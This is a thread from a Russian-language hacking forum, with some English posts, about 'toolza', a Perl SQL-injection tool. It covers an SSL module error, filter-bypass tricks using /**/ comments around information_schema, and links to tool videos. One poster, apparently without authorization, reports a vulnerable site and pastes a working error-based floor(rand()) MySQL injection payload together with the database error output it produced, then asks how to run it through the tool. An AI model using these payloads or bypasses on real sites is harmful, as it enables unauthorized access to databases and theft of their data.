Старый 20.07.2011, 04:53   #31
xCedz
 
Регистрация: 05.07.2010
Сообщений: 33
Репутация: 6
По умолчанию

нафик гуи, Вон скульмап живет без гуи и ниче
xCedz вне форума   Ответить с цитированием
Старый 13.08.2011, 06:20   #32
YuNi|[c
 
Аватар для YuNi|[c
 
Регистрация: 03.01.2011
Сообщений: 86
Репутация: 0
По умолчанию

почему то при работе с ssl ошибка:
Thread 10 terminated abnormally: Can't locate object method "new" via package "IO::Socket::SSL" (perhaps you forgot to load "IO::Socket:
:SSL"?) at C:\tools\toolza_last\toolza.pl line 206, <STDIN> line 3.
на PPM IO-Socket-SSL установлен
YuNi|[c вне форума   Ответить с цитированием
Старый 13.08.2011, 12:32   #33
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
perhaps you forgot to load "IO::Socket: :SSL"?
Перевод:

Цитата:
Возможно вы забыли загрузить "IO::Socket: :SSL"?
5-ая строчка

Код:
#use IO::Socket::SSL; # For enable HTTPS support uncomment this line
убрать решетку в начале строки, решетка стоит там только по одной причине - не у всех есть/получается установить "IO::Socket: :SSL", если его нет и строчка разкоментирована - скрипт не будет работать вообще
---
http://forum.antichat.ru/threadnav60...et-SSLeay.html

Последний раз редактировалось .Slip; 13.08.2011 в 21:18..
Pashkela вне форума   Ответить с цитированием
Старый 13.08.2011, 15:26   #34
}{оттабыч
Banned
 
Регистрация: 08.10.2010
Сообщений: 188
Репутация: 53
По умолчанию

Паша, там что то с парсером в response.

Крутил Error-based SQL-Injection, там в логах запрос верный, через браузер инфу выводит, а так в скрипте не работало.
}{оттабыч вне форума   Ответить с цитированием
Старый 13.08.2011, 15:31   #35
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

пример в студию)
Pashkela вне форума   Ответить с цитированием
Старый 03.06.2012, 20:59   #36
Pirotexnik
 
Аватар для Pirotexnik
 
Регистрация: 16.05.2012
Сообщений: 32
Репутация: -2
По умолчанию

По поводу спецсимволов в from
Действительно небходимо, напирмер если есть фильтрация "from information_schema.*@ - в этой ситуацие спасает /**/

select ... from/**/information_schema/**/./**/tables
select ... from/**/information_schema/*!.*/tables

А так крутота) В некоторых моментах удобнее скульмап.
__________________
h4q 4ll w0rld
Pirotexnik вне форума   Ответить с цитированием
Старый 05.08.2012, 22:16   #37
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

and more videos:

http://moemesto.ru/webkraft/file/9447906/4332342343.rar
http://moemesto.ru/webkraft/file/9146113/6.rar <--- switch GET to POST and SOCKS
http://moemesto.ru/webkraft/file/8389510/12.rar

PS: not mine

Последний раз редактировалось Pashkela; 05.08.2012 в 22:24..
Pashkela вне форума   Ответить с цитированием
Старый 10.12.2012, 17:07   #38
linuxkernal
 
Регистрация: 08.12.2012
Сообщений: 1
Репутация: 0
По умолчанию

Hi

i have one site vulnerable and method working is error based but in toolza i try some strings in floor rand but not getting success so please help me

http://www.123.com/index.php?id=475869' and i get this error

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND members.IndustryID=industry.id' at line 1

when i am using floor rand manually this give like this query is i am using this

+or(1,2)=(select+count(*),concat((select+version() +from+information_schema.tables+limit+0,1),0x3a,fl oor(rand()*2))+from+information_schema.tables+grou p+by+2+limit+0,1)--+

Warning: mysql_query() [function.mysql-query]: Unable to save result set in /var/www/cset/public_html/index.php on line 57
Duplicate entry '5.1.65-cll:1' for key 'group_key'

now how can i use this in toolza?
linuxkernal вне форума   Ответить с цитированием
Старый 24.07.2013, 12:45   #39
mff
 
Аватар для mff
 
Регистрация: 24.07.2013
Сообщений: 2
Репутация: 0
По умолчанию

Pashkela, доброго вам дня и здравия!
Не могли бы вы перезалить прожку sitescaner1.1.exe вот эту:



Был бы очень благодарен!
mff вне форума   Ответить с цитированием
Старый 24.07.2013, 15:21   #40
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

не осталось, да и потом она в один поток была, так что сорре
Pashkela вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot